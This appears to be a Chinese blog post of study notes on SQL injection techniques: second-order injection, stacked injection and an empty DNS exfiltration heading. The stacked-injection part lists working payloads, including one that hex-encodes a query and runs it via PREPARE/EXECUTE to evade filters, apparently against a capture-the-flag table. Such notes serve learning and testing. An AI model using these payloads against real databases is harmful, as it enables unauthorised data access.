堆叠注入&二次注入&DNS外带

作者:xiaowu 日期: 分类:xiaowu 浏览:587

image.png

  • 二次注入
    :插入后调用显示操作符合

    • 数据由自己添加插入

    • 程序更新或查询,把攻击语句·取出来调用

    • 条件


  • 堆叠注入
    根据数据库类型决定是否支持多条语句执行

    • ';show databases;

    • ';show tables;

    • ';show columns from 1919810931114514;

    • ';select flag from 1919810931114514;

    • ';SeT @a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;

    • 语句

    • MYSQL

    • MSSQL

    • Postgresql

    • 支持的数据库

  • DNS外带

  •  


关键词:

网友评论

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。